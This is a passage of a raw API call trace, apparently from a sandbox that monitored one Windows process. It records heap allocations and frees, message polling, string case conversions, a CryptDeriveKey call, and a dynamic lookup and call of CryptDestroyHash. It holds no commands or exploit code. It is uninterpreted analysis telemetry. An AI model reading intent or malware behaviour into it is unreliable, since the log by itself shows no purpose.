Size=0x10) returned 0x24aaec0 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0263.935] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.935] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.935] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.936] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.936] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.936] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.936] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.936] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0263.936] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.937] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0263.937] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.937] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.937] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5960, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0263.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0263.941] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.942] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0263.942] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.942] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.943] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0263.943] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.944] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.944] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.944] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.944] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0263.945] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.946] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0263.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0263.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.947] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0263.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0263.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0263.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.947] CryptDestroyHash (hHash=0xaa5960) returned 1 [0263.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0263.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0263.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0263.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0263.948] RtlAllocateHeap (HeapHandle=0x25c0000, 